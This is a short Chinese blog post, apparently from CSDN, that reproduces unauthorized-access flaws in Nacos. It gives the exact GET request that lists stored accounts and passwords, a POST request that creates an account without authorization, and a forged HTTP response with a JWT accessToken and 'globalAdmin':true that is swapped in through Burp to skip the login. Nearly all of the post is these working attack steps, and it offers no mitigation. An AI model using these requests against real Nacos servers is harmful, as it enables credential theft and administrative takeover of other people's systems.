Nacos 未授权访问漏洞复现

文章揭示了一个Nacos系统中的安全问题,允许通过GET请求读取账号密码,并能通过POST请求无授权创建账户。此外,通过抓包工具修改HTTP响应包内容,可以绕过身份验证,非法进入后台。这表明系统存在严重的权限管理和认证漏洞。
摘要由CSDN通过智能技术生成

漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9

 读取账号密码

任意创建账户
POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1
抓包将get方式修改为post并重放

账户已被创建

 未授权进入后台

输入任意密码bp抓包修改返回包即可绕过进入后台

修改回包内容如下

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

 成功进入后台

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值